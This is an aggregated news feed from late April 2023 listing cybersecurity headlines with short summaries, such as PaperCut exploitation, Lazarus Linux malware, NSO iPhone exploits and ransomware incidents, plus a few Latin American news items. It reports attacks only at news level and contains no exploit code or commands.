                Autosummary: “We have built our platform in such a way that automotive, networking equipment, consumer IoT, industrial control systems, and medical device firmware alike are all supported,” said Tom Pace, CEO of NetRise. "


                Expel Vulnerability Prioritization identifies critical and damaging vulnerabilities

                exploits
                2023-04-24 https://www.helpnetsecurity.com/2023/04/24/expel-vulnerability-prioritization-identifies-critical-and-damaging-vulnerabilities/

                Expel has released Expel Vulnerability Prioritization, a new solution that highlights which vulnerabilities pose the greatest risk, so organizations can take immediate, informed action. The solution empowers security teams to understand their most urgent risk areas within their detection and response workflows for seamless investigation and remediation, and eliminates the need for teams to spend hours investigating vulnerabilities. “Not all vulnerabilities were created equal—resource-constrained teams dealing with an ever-increasing list of things to patch and … More

                The post Expel Vulnerability Prioritization identifies critical and damaging vulnerabilities appeared first on Help Net Security.

                "

                Autosummary: "


                Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers

                exploits rusia-ucrania
                2023-04-24 https://thehackernews.com/2023/04/russian-hackers-suspected-in-ongoing.html
                Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro. "PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01 "

                Autosummary: "


                Migrants march through Mexico in demand for justice

                latam
                2023-04-24 https://www.bbc.co.uk/news/world-latin-america-65370238?at_medium=RSS&at_campaign=KARANGA
                Thousands of people are walking to Mexico City to protest at the poor treatment of migrants. "

                Autosummary: "


                Resecurity to showcase innovative cybersecurity solutions at RSA Conference 2023

                ciber
                2023-04-24 https://www.helpnetsecurity.com/2023/04/24/resecurity-solutions-rsa-conference-2023/

                Resecurity is excited to announce its participation at RSA Conference 2023, the cybersecurity event that brings together industry leaders and professionals to share knowledge and insights on the latest trends, threats, and solutions. The event will take place from April 24-27, 2023, at the Moscone Center in San Francisco, California. This year’s theme “Stronger Together” resonates with Resecurity’s mission to provide cybersecurity solutions that empower organizations to detect, prevent, and respond to sophisticated cyber threats. … More

                The post Resecurity to showcase innovative cybersecurity solutions at RSA Conference 2023 appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites

                exploits
                2023-04-24 https://thehackernews.com/2023/04/hackers-exploit-outdated-wordpress.html
                Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign, Sucuri revealed in a report published last week. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code into pages and posts of WordPress sites that’s then executed every time the posts are "

                Autosummary: "The way the Eval PHP plugin works it’s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes," Martin explained, adding the rogue pages are created with a real site administrator as their author, suggesting the attackers were able to successfully sign in as a privileged user. "


                Russian cybercrime group likely behind ongoing exploitation of PaperCut flaws

                exploits rusia-ucrania
                2023-04-24 https://securityaffairs.com/145190/hacking/russian-hackers-papercut-flaws-attacks.html

                Print management software provider PaperCut confirmed ongoing active exploitation of the CVE-2023-27350 vulnerability. On April 19th, PaperCut confirmed that it is aware of the active exploitation of the CVE-2023-27350 vulnerability. The company received two vulnerability reports from the cybersecurity firm Trend Micro for high/critical severity security issues in PaperCut MF/NG. Trend Micro announced they will […]

                The post Russian cybercrime group likely behind ongoing exploitation of PaperCut flaws appeared first on Security Affairs.

                "

                Autosummary: "


                Exploit released for PaperCut flaw abused to hijack servers, patch now

                exploits
                2023-04-24 https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/
                Attackers are exploiting severe vulnerabilities in the widely-used PaperCut MF/NG print management software to install Atera remote management software to take over servers. [...] "

                Autosummary: Figure caption: Internet-exposed PaperCut servers (Shodan). Links to Clop ransomware: According to Huntress security researchers who have been analyzing post-exploitation activity linked to these ongoing attacks since April 16, when the first attacks were observed, threat actors have been using the flaw to execute PowerShell commands that install Atera and Syncro remote management software. "


                KuCoin’s Twitter account hacked to promote crypto scam

                financial
                2023-04-24 https://www.bleepingcomputer.com/news/security/kucoins-twitter-account-hacked-to-promote-crypto-scam/
                KuCoin’s Twitter account was hacked, allowing attackers to promote a fake giveaway scam that led to the theft of over $22.6K in cryptocurrency. [...] "

                Autosummary: Figure caption: Fake KuCoin promotion on kucoinevent[.]com (Source: BleepingComputer). The fake giveaway invited all users to participate by sending any amount and receiving double in return, claiming that all persons are eligible for participation, even those without a KuCoin account. "


                Akamai Brand Protector defends against phishing attacks and fake websites

                financial
                2023-04-24 https://www.helpnetsecurity.com/2023/04/24/akamai-brand-protector/

                At RSA Conference 2023, Akamai Technologies unveiled Brand Protector, a new solution that detects and disrupts phishing sites, fake stores, and brand impersonations. Brand Protector enables organizations to retain and grow customer loyalty while minimizing loss, drops in productivity and bad customer feedback. According to Google, over 50,000 new phishing websites are created every week. Akamai Brand Protector inspects trillions of digital activities a day across both internal and external sources to discover abuse of … More

                The post Akamai Brand Protector defends against phishing attacks and fake websites appeared first on Help Net Security.

                "

                Autosummary: “Attackers are increasingly abusing trusted brand names to lure end-users through phishing and fake sites for the promise of financial gain,” said Rupesh Chokshi, SVP and GM, Application Security at Akamai. "


                Russian Hackers Tomiris Targeting Central Asia for Intelligence Gathering

                rusia-ucrania
                2023-04-24 https://thehackernews.com/2023/04/russian-hackers-tomiris-targeting.html
                The Russian-speaking threat actor behind a backdoor known as Tomiris is primarily focused on gathering intelligence in Central Asia, fresh findings from Kaspersky reveal. "Tomiris’s endgame consistently appears to be the regular theft of internal documents," security researchers Pierre Delcher and Ivan Kwiatkowski said in an analysis published today. "The threat actor targets government and "

                Autosummary: "More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy," the researchers explained. "


                Ransomware Hackers Using AuKill Tool to Disable EDR Software Using BYOVD Attack

                exploits
                2023-04-24 https://thehackernews.com/2023/04/ransomware-hackers-using-aukill-tool-to.html
                Threat actors are employing a previously undocumented "defense evasion tool" dubbed AuKill that’s designed to disable endpoint detection and response (EDR) software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack. "The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying "

                Autosummary: Grixba, a .NET-based information stealer, is designed to scan a machine for security programs, backup software, and remote administration tools, and exfiltrate the gathered data in the form of CSV files that are then compressed into ZIP archives. "


                VirusTotal now has an AI-powered malware analysis feature

                exploits
                2023-04-24 https://www.bleepingcomputer.com/news/security/virustotal-now-has-an-ai-powered-malware-analysis-feature/
                VirusTotal announced on Monday the launch of a new artificial intelligence-based code analysis feature named Code Insight. [...] "

                Autosummary: "


                National Cybersecurity Alliance launches HBCU Scholarship Program

                ciber
                2023-04-24 https://www.helpnetsecurity.com/2023/04/25/national-cybersecurity-alliance-hbcu-scholarship-program/

                The National Cybersecurity Alliance (NCA) launched their Historically Black Colleges and Universities Scholarship Program. Established in partnership with One In Tech, an ISACA Foundation, the initiative will provide support to individuals who are currently underrepresented in the industry by ensuring equitable access and advancements within the cybersecurity and tech careers. The new program will build off of NCA’s recently launched HBCU Career Program “See Yourself In Cyber” that aims to equip students with the necessary … More

                The post National Cybersecurity Alliance launches HBCU Scholarship Program appeared first on Help Net Security.

                "

                Autosummary: "


                Experts released PoC Exploit code for actively exploited PaperCut flaw

                exploits
                2023-04-24 https://securityaffairs.com/145215/hacking/papercut-poc-exploit-code.html

                Threat actors are exploiting PaperCut MF/NG print management software flaws in attacks in the wild, while researchers released PoC exploit code. Hackers are actively exploiting PaperCut MF/NG print management software flaws (tracked as CVE-2023-27350 and CVE-2023-27351) in attacks in the wild. The threat actors were observed installing the Atera remote management software to take over vulnerable servers. On […]

                The post Experts released PoC Exploit code for actively exploited PaperCut flaw appeared first on Security Affairs.

                "

                Autosummary: "


                Fake Flipper Zero sellers are after your money

                financial
                2023-04-24 https://www.malwarebytes.com/blog/news/2023/04/fake-flipper-zero-sellers-are-after-your-money

                Categories: News, Scams

                Tags: Flipper Zero, fake Flipper Zero sites

                Flipper Zero units are being sold on sites not recognized by developers. Stay away!


                The post Fake Flipper Zero sellers are after your money appeared first on Malwarebytes Labs.

                "

                Autosummary: The makings of a fake Flipper Zero site: Most bogus Flipper Zero sites mimic the clean design of the real thing located at the genuine site, flipperzero.one. If you’re on the genuine Flipper Zero site, payment methods will include card, PayPal, and Google Pay. "


                Week in review: 5 free online cybersecurity resources for SMBs, AI tools might fuel BEC attacks

                ciber
                2023-04-23 https://www.helpnetsecurity.com/2023/04/23/week-in-review-5-free-online-cybersecurity-resources-for-smbs-ai-tools-might-fuel-bec-attacks/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Balancing cybersecurity with business priorities: Advice for Boards In this Help Net Security interview, Alicja Cade, Director, Financial Services, Office of the CISO, Google Cloud, offers insights on how asking the right questions can help improve cyber performance and readiness, advance responsible AI practices, and balance the need for cybersecurity with other business priorities. Wargaming an effective data breach playbook … More

                The post Week in review: 5 free online cybersecurity resources for SMBs, AI tools might fuel BEC attacks appeared first on Help Net Security.

                "

                Autosummary: New infosec products of the week: April 21, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Armorblox, Cofense, D3 Security, Sotero, Venafi, Veracode, Versa Networks, and Zyxel Networks. "


                Decoy Dog malware toolkit found after analyzing 70 billion DNS queries

                exploits
                2023-04-23 https://www.bleepingcomputer.com/news/security/decoy-dog-malware-toolkit-found-after-analyzing-70-billion-dns-queries/
                A new enterprise-targeting malware toolkit called "Decoy Dog" has been discovered after inspecting anomalous DNS traffic that is distinct from regular internet activity. [...] "

                Autosummary: “This multiple-part (DNS) signature gave us strong confidence that the (correlated) domains were not only using Pupy, but they were all part of Decoy Dog – a large, single toolkit that deployed Pupy in a very specific manner on enterprise or large organizational, non-consumer, devices,” Infoblox revealed in its report. "


                Health insurer Point32Health suffered a ransomware attack

                exploits ransomware
                2023-04-23 https://securityaffairs.com/145183/cyber-crime/point32health-ransomware-attack.html

                Non-profit health insurer Point32Health suffered a ransomware attack and has taken systems offline in response to the incident. Non-profit health insurer Point32Health has taken systems offline in response to a ransomware attack that took place on April 17. The insurer immediately launched an investigation into the incident with the help of third-party cybersecurity experts to […]

                The post Health insurer Point32Health suffered a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Argentina dengue: Record fever outbreak kills over 40

                latam
                2023-04-22 https://www.bbc.co.uk/news/world-latin-america-65356495?at_medium=RSS&at_campaign=KARANGA
                Argentina steps up anti-mosquito measures, including use of radiation to reduce the disease carriers. "

                Autosummary: "


                Onapsis updates its platform to strengthen ERP cybersecurity

                ciber
                2023-04-22 https://www.helpnetsecurity.com/2023/04/22/onapsis-platform-update/

                Onapsis has unveiled a series of new product updates for the Onapsis Platform. Enriched with threat intelligence, the Onapsis Platform further simplifies business application security for CISOs and CIOs alike with a new Security Advisor, new updates to its Comply product line, and critical enhancements that streamline code security from application development to production. “As the only cybersecurity and compliance solution endorsed by SAP, Onapsis is proud to lead the charge in helping organizations … More

                The post Onapsis updates its platform to strengthen ERP cybersecurity appeared first on Help Net Security.

                "

                Autosummary: The Security Advisor leverages the accumulated “best security practices” to: identify gaps in visibility and areas for improvement; highlight areas of unaddressed risk; track effectiveness of response over time; benchmark an organization against others and chart progress; provide personalized guidance and insights based on a client’s unique landscape; and help security and business leaders better communicate security progress to their leadership and the board. "


                CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug

                exploits
                2023-04-22 https://thehackernews.com/2023/04/cisa-adds-3-actively-exploited-flaws-to.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The three vulnerabilities are as follows - CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability  CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control "

                Autosummary: The three vulnerabilities are as follows: CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability; CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability; CVE-2023-2136 (CVSS score - TBD) - Google Chrome Skia Integer Overflow Vulnerability. "In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure," MinIO maintainers said in an advisory published on March 21, 2023. "


                GitHub now allows enabling private vulnerability reporting at scale

                exploits
                2023-04-22 https://www.bleepingcomputer.com/news/security/github-now-allows-enabling-private-vulnerability-reporting-at-scale/
                GitHub announced that private vulnerability reporting is now generally available and can be enabled at scale, on all repositories belonging to an organization.  [...] "

                Autosummary: "


                EvilExtractor malware activity spikes in Europe and the U.S.

                exploits
                2023-04-22 https://www.bleepingcomputer.com/news/security/evilextractor-malware-activity-spikes-in-europe-and-the-us/
                Researchers are seeing a rise in attacks spreading the EvilExtractor data theft tool, used to steal users' sensitive data in Europe and the U.S. [...] "

                Autosummary: .NET loader's code (Fortinet). The EvilExtractor version deployed in these attacks features the following modules: date time checking, anti-sandbox, anti-VM, anti-scanner, FTP server setting, steal data, upload stolen data, clear log, and ransomware. The EvilExtractor data-stealing module will download three additional Python components named "KK2023.zip," "Confirm.zip," and "MnMs.zip." "


                Google ads push BumbleBee malware used by ransomware gangs

                exploits ransomware
                2023-04-22 https://www.bleepingcomputer.com/news/security/google-ads-push-bumblebee-malware-used-by-ransomware-gangs/
                The enterprise-targeting Bumblebee malware is distributed through Google Ads and SEO poisoning that promote popular software like Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. [...] "

                Autosummary: The tools the attackers deployed on the breached environment include the Cobalt Strike pen-test suite, the AnyDesk and DameWare remote access tools, network scanning utilities, an AD database dumper, and a Kerberos credentials stealer. "


                CISA adds MinIO, PaperCut, and Chrome bugs to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-22 https://securityaffairs.com/145139/security/known-exploited-vulnerabilities-catalog-minio-papercut-and-chrome.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added MinIO, PaperCut, and Chrome vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following three new issues to its Known Exploited Vulnerabilities Catalog: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have […]

                The post CISA adds MinIO, PaperCut, and Chrome bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Scammers using social media to dupe people into becoming money mules

                financial
                2023-04-21 https://www.helpnetsecurity.com/2023/04/21/fraudsters-targeting-consumers-money-mules/

                Fraudsters are taking advantage of the widening fraud knowledge gap, outlining the urgent need for banks to educate and protect their customers with technology, according to Feedzai. The report reveals that while 56% of respondents have been a victim of a financial scam, many still lack the knowledge to detect and distinguish between the various types of financial crime. Consumers demand accountability Consequently, many consumers believe the responsibility for reimbursement lies with their bank, with … More

                The post Scammers using social media to dupe people into becoming money mules appeared first on Help Net Security.

                "

                Autosummary: “With a surge in digital banking services, a willingness among customers to switch banks, and an ongoing cost of living crisis, it is more important than ever for banks to foster strong relationships with their customers and establish trust. "


                Sotero Ransomware Protection encrypts data to prevent theft and extortion

                exploits ransomware
                2023-04-21 https://www.helpnetsecurity.com/2023/04/21/sotero-ransomware-protection/

                Sotero has launched Sotero Ransomware Protection, giving organizations the ability to proactively protect unstructured data from attack by utilizing behavior-based detection. Most currently available ransomware solutions use a signature-based approach that detects only currently known ransomware strains – a method that broadly protects against malware concerns, but does not guarantee protection against zero-day attacks. Sotero’s Ransomware Protection not only detects currently known ransomware, but also provides the ability to detect and protect data from zero-day … More

                The post Sotero Ransomware Protection encrypts data to prevent theft and extortion appeared first on Help Net Security.

                "

                Autosummary: "


                Bugcrowd’s new self-serve PTaaS enables buyers to manage pen tests directly online

                exploits
                2023-04-21 https://www.helpnetsecurity.com/2023/04/21/bugcrowd-ptaas/

                Bugcrowd has released new capabilities in its Penetration Testing as a Service (PTaaS) offering that enables buyers to purchase, set up, and manage pen tests directly online without a need for lengthy sales calls and scoping sessions. PTaaS is one of several solutions delivered on the Bugcrowd Security Knowledge Platform. Legacy pen test solutions are slow, nontransparent, and low impact, and other PTaaS providers deliver what are often shallow vulnerability assessments–with neither offering access to … More

                The post Bugcrowd’s new self-serve PTaaS enables buyers to manage pen tests directly online appeared first on Help Net Security.

                "

                Autosummary: "


                Intro to phishing: simulating attacks to build resiliency

                financial
                2023-04-21 https://securityaffairs.com/145100/hacking/phishing-simulating-attacks.html

                Phishing attacks are a major threat to organizations; they remain a perennial choice of cybercriminals when it comes to hacking their victims. Original post at hxxps://cybernews.com/security/phishing-intro-to-build-resiliency/ While organizations must still account for flashy vulnerability exploitations, denial-of-service campaigns, or movie-themed cyber-heists, phishing-based social engineering attacks remain a perennial choice of cybercriminals when it comes to hacking […]

                The post Intro to phishing: simulating attacks to build resiliency appeared first on Security Affairs.

                "

                Autosummary: An organization’s access controls and security tools (for example, secure email gateways, network filtering mechanisms, SIEM, and so on) do not guarantee relative safety either, as several classes of social engineering platforms, reverse proxies, or man-in-the-middle (MitM) frameworks are fully capable of nullifying multifactor authentication (MFA) and other traditional security protections. #1 – Sending Profile: Name – any name works; Interface Type – SMTP; SMTP From – the email account the campaign sends emails as; Host – the server sending the emails (smtp.gmail.com, etc.). #2 – Users & Groups. Fresh tactics: cybercriminals employ a blend of focused and indirect phishing methods to lure unsuspecting victims, which include targeted attacks crafted towards specific individuals or departments (spear phishing), attacks focused exclusively on high-value targets like business executives (whaling), or even tax-related schemes. "


                American Bar Association data breach hits 1.4 million members

                financial
                2023-04-21 https://www.bleepingcomputer.com/news/security/american-bar-association-data-breach-hits-14-million-members/
                The American Bar Association (ABA) has suffered a data breach after hackers compromised its network and gained access to older credentials for 1,466,000 members. [...] "

                Autosummary: Thursday night, the ABA began notifying members that a hacker was detected on its network on March 17th, 2003, and may have gained access to members' login credentials for a legacy member system decommissioned in 2018. "


                Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions

                industry
                2023-04-21 https://securityaffairs.com/145108/security/industrial-network-director-and-modeling-labs-critical-flaws.html

                Cisco released security updates to address critical security flaws in its Industrial Network Director and Modeling Labs solutions. Cisco released security updates to address critical security vulnerabilities in the Industrial Network Director and Modeling Labs solutions. An attacker can exploit these vulnerabilities to inject arbitrary operating system commands or access sensitive data. One of the […]

                The post Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions appeared first on Security Affairs.

                "

                Autosummary: "


                Kubernetes RBAC Exploited in Large-Scale Campaign for Cryptocurrency Mining

                exploits
                2023-04-21 https://thehackernews.com/2023/04/kubernetes-rbac-exploited-in-large.html
                A large-scale attack campaign discovered in the wild has been exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) to create backdoors and run cryptocurrency miners. "The attackers also deployed DaemonSets to take over and hijack resources of the K8s clusters they attack," cloud security firm Aqua said in a report shared with The Hacker News. The Israeli company, which dubbed the attack "

                Autosummary: "Next, the attacker created a "ServiceAccount", "kube-controller" in the "kube-system" namespace. "


                American Bar Association (ABA) suffered a data breach, 1.4 million members impacted

                financial
                2023-04-21 https://securityaffairs.com/145125/data-breach/american-bar-association-data-breach.html

                The American Bar Association (ABA) disclosed a data breach, threat actors gained access to older credentials for 1,466,000 members. The American Bar Association (ABA) is a voluntary bar association of lawyers and law students; it is not specific to any jurisdiction in the United States. The ABA has 166,000 members as of 2022. The attackers may have […]

                The post American Bar Association (ABA) suffered a data breach, 1.4 million members impacted appeared first on Security Affairs.

                "

                Autosummary: "


                Alejandro Toledo: Peru ex-president to be extradited from US

                latam
                2023-04-21 https://www.bbc.co.uk/news/world-latin-america-65355697?at_medium=RSS&at_campaign=KARANGA
                Alejandro Toledo's lawyers unsuccessfully attempted to stop his extradition earlier in the week. "

                Autosummary: "


                The Week in Ransomware - April 21st 2023 - Macs in the Crosshairs

                exploits ransomware
                2023-04-21 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-21st-2023-macs-in-the-crosshairs/
                A lot of news broke this week related to ransomware, with the discovery of LockBit testing macOS encryptors to an outage on NCR, causing massive headaches for restaurants. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include @billtoulas, @fwosar, @BleepinComputer, @LawrenceAbrams, @Ionut_Ilascu, @serghei, @demonslay335, @jorntvdw, @malwrhunterteam, @Seifreed, @AShukuhi, @patrickwardle, @Kostastsale, @BlackBerry, @TrendMicro, @WhichbufferArda, @NCCGroupplc, @BroadcomSW, @IBMSecurity, @AhnLab_man, @SophosXOps, @SentinelOne, @pcrisk, @AlvieriD, @BrettCallow, and @siri_urz. Some interesting research on ransomware was also released this week, including: Finally, we learned about some ransomware attacks, with an NCR outage confirmed to be ransomware and Capita confirming that data was stolen in a cyberattack. "


                Update now, there's a Chrome zero-day in the wild

                exploits
                2023-04-21 https://www.malwarebytes.com/blog/news/2023/04/update-chrome-now-an-exploited-zero-day-in-the-wild

                Categories: News

                Tags: chrome

                Tags: browser

                Tags: update

                Tags: vulnerability

                Tags: CVE

                Tags: exploit

                Tags: exploitation

                Tags: zero-day

                Users of Chrome should ensure they're running the latest version to patch an integer overflow in the Skia graphics library.


                The post Update now, there's a Chrome zero-day in the wild appeared first on Malwarebytes Labs.

                "

                Autosummary: If the number is used to set the length of a data buffer (an area of memory used to hold data), an integer overflow can lead to a buffer overflow, a vulnerability that allows an attacker to overload a buffer with more data than it's expecting, which creates a route for the attacker to manipulate the program. "


                iOS Lockdown Mode effective against NSO zero-click exploit

                exploits
                2023-04-21 https://www.malwarebytes.com/blog/news/2023/04/ios-lockdown-mode-effective-against-nso-zero-click-exploit

                Categories: Apple

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Apple

                Tags: Lockdown Mode

                Tags: NSO

                Tags: PWNYOURHOME

                Tags: FINDMYPWN

                Tags: LATENTIMAGE

                Apple's Lockdown Mode has shown that it can do what it was designed to do by notifying users about an NSO exploit.


                The post iOS Lockdown Mode effective against NSO zero-click exploit appeared first on Malwarebytes Labs.

                "

                Autosummary: To exclude an app or edit your excluded websites: open the Settings app, tap Privacy & Security, under Security tap Lockdown Mode, then tap Configure Web Browsing to exclude websites or apps from Lockdown Mode on iPhone. To exclude an app, turn that app off in the menu. How to enable Lockdown Mode on iPhone or iPad: open the Settings app, tap Privacy & Security, under Security tap Lockdown Mode, tap Turn On Lockdown Mode, then tap Turn On & Restart and enter your device passcode. Pegasus spyware, developed by NSO Group, has featured in many news stories, after being found to have been used against journalists, politicians, State Department employees, embassy workers, and activists. "


                How companies are struggling to build and run effective cybersecurity programs

                ciber
                2023-04-20 https://www.helpnetsecurity.com/2023/04/20/build-run-effective-cybersecurity-programs-video/

                A recent Code42 report reveals a rapidly growing number of inside risk incidents and a concerning lack of training and technology, further exacerbated by increasing workforce turnover and cloud adoption. In this Help Net Security video, Joe Payne, President and CEO at Code42, discusses how data loss from insiders is not a new problem but has become more complex.

                The post How companies are struggling to build and run effective cybersecurity programs appeared first on Help Net Security.

                "

                Autosummary: "


                Outdated cybersecurity practices leave door open for criminals

                ciber
                2023-04-20 https://www.helpnetsecurity.com/2023/04/20/outdated-cybersecurity-practices/

                Organizations experienced a significant increase in ransomware – from an average of four attacks over five years in 2021 versus four attacks over the course of one year in 2022, according to ExtraHop. Of those who fell victim, 83% admitted to paying the ransom at least once. As organizations increasingly find themselves under attack, the data discovered they are drowning in cybersecurity debt – unaddressed security vulnerabilities like unpatched software, unmanaged devices, shadow IT, and … More

                The post Outdated cybersecurity practices leave door open for criminals appeared first on Help Net Security.

                "

                Autosummary: "


                Trigona Ransomware targets Microsoft SQL servers

                exploits ransomware
                2023-04-20 https://securityaffairs.com/145036/cyber-crime/trigona-ransomware-targets-microsoft-sql-servers.html

                Threat actors are hacking poorly secured and Internet-exposed Microsoft SQL servers to deploy the Trigona ransomware. Threat actors are hacking into poorly secured and public-facing Microsoft SQL servers to deploy Trigona ransomware. Trigona is a malware strain that was discovered in October 2022, and Palo Alto Unit 42 researchers reported similarities between Trigona and the […]

                The post Trigona Ransomware targets Microsoft SQL servers appeared first on Security Affairs.

                "

                Autosummary: "


                Capita confirms hackers stole data in recent cyberattack

                ciber
                2023-04-20 https://www.bleepingcomputer.com/news/security/capita-confirms-hackers-stole-data-in-recent-cyberattack/
                London-based professional outsourcing giant Capita has published an update on the cyber-incident that impacted it at the start of the month, now admitting that hackers exfiltrated data from its systems. [...] "

                Autosummary: According to the latest update, the initial unauthorized access to Capita's systems occurred on March 22, 2023, and remained uninterrupted until the firm realized the breach on March 31, 2022. "


                FTC accuses payments firm of knowingly assisting tech support scammers

                financial
                2023-04-20 https://www.tripwire.com/state-of-security/ftc-accuses-payments-firm-knowingly-assisting-tech-support-scammers
                Multinational payment processing firm Nexway has been rapped across the knuckles by the US authorities, who claim that the firm knowingly processed fraudulent credit card payments on behalf of tech support scammers. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job

                exploits
                2023-04-20 https://thehackernews.com/2023/04/lazarus-group-adds-linux-malware-to.html
                The notorious North Korea-aligned state-sponsored actor known as the Lazarus Group has been attributed to a new campaign aimed at Linux users. The attacks are part of a persistent and long-running activity tracked under the name Operation Dream Job, ESET said in a new report published today. The findings are crucial, not least because it marks the first publicly documented example of the "

                Autosummary: Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. "


                Fortra Sheds Light on GoAnywhere MFT Zero-Day Exploit Used in Ransomware Attacks

                exploits ransomware
                2023-04-20 https://thehackernews.com/2023/04/fortra-sheds-light-on-goanywhere-mft.html
                Fortra, the company behind Cobalt Strike, shed light on a zero-day remote code execution (RCE) vulnerability in its GoAnywhere MFT tool that has come under active exploitation by ransomware actors to steal sensitive data. The high-severity flaw, tracked as CVE-2023-0669 (CVSS score: 7.2), concerns a case of pre-authenticated command injection that could be abused to achieve code execution. The "

                Autosummary: The threat actor further abused the flaw to deploy two additional tools, dubbed "Netcat" and "Errors.jsp," between January 28, 2023 and January 31, 2023, although not every installation attempt is said to have been successful. "


                Daggerfly Cyberattack Campaign Hits African Telecom Services Providers

                ciber
                2023-04-20 https://thehackernews.com/2023/04/daggerfly-cyberattack-campaign-hits.html
                Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022. The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda. The campaign makes use of "previously unseen plugins from "

                Autosummary: The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service. "


                NSO Group Used 3 Zero-Click iPhone Exploits Against Human Rights Defenders

                exploits
                2023-04-20 https://thehackernews.com/2023/04/nso-group-used-3-zero-click-iphone.html
                Israeli spyware maker NSO Group deployed at least three novel "zero-click" exploits against iPhones in 2022 to infiltrate defenses erected by Apple and deploy Pegasus, according to the latest findings from Citizen Lab. "NSO Group customers widely deployed at least three iOS 15 and iOS 16 zero-click exploit chains against civil society targets around the world," the interdisciplinary laboratory "

                Autosummary: NSO Group is the manufacturer of Pegasus, a sophisticated cyber weapon that's capable of extracting sensitive information stored in a device (e.g., messages, locations, photos, and call logs, among others) in real-time. This entailed the use of three disparate exploit chains dubbed LATENTIMAGE, FINDMYPWN, and PWNYOURHOME that weaponized various flaws in iOS 15 and iOS 16 as zero-days to penetrate the devices and ultimately launch Pegasus - LATENTIMAGE (iOS version 15.1.1, detected in January 2022) - "


                Brazil Congress storming: Lula's security chief resigns

                latam
                2023-04-20 https://www.bbc.co.uk/news/world-latin-america-65336209?at_medium=RSS&at_campaign=KARANGA
                Marcos Gonçalves Dias steps down after video shows him in the presidential palace as it was stormed. "

                Autosummary: "


                VMware fixes vRealize bug that let attackers run code as root

                exploits
                2023-04-20 https://www.bleepingcomputer.com/news/security/vmware-fixes-vrealize-bug-that-let-attackers-run-code-as-root/
                VMware addressed a critical vRealize Log Insight security vulnerability that allows remote attackers to gain remote execution on vulnerable appliances. [...] "

                Autosummary: "


                Lazarus hackers now push Linux malware via fake job offers

                exploits
                2023-04-20 https://www.bleepingcomputer.com/news/security/lazarus-hackers-now-push-linux-malware-via-fake-job-offers/
                A new Lazarus campaign considered part of "Operation DreamJob" has been discovered targeting Linux users with malware for the first time. [...] "

                Autosummary: "Taking a look at the three 32-bit integers, 0xC2B45678, 0x90ABCDEF, and 0xFE268455 from Figure 5, which represent a key for a custom implementation of the A5/1 cipher, we realized that the same algorithm and the identical keys were used in Windows malware that dates back to the end of 2014 and was involved in one of the most notorious Lazarus cases: the cybersabotage of Sony Pictures Entertainment," explained ESET. Also, ESET found an earlier variant of the SimplexTea malware on VirusTotal, named "sysnetd," which is also similar to the mentioned backdoors but written in C. Domains used for fake TLS connections (left - BadCall, right - sysnetd) (ESET) "


                LockBit ransomware for Mac – coming soon?

                exploits ransomware
                2023-04-20 https://grahamcluley.com/lockbit-ransomware-for-mac-coming-soon/
                In the last couple of days it has become clear that the notorious LockBit ransomware gang has been exploring creating what could become a big headache for users of Mac computers. "

                Autosummary: "


                MacStealer – newly-discovered malware steals passwords and exfiltrates data from infected Macs

                exploits
                2023-04-20 https://grahamcluley.com/macstealer-newly-discovered-malware-steals-passwords-and-exfiltrates-data-from-infected-macs/
                I'm still encountering people who, even after all these years, believe that their Apple Mac computers are somehow magically invulnerable to ever being infected by malware. Maybe details of this new Mac malware will change their mind... "

                Autosummary: "


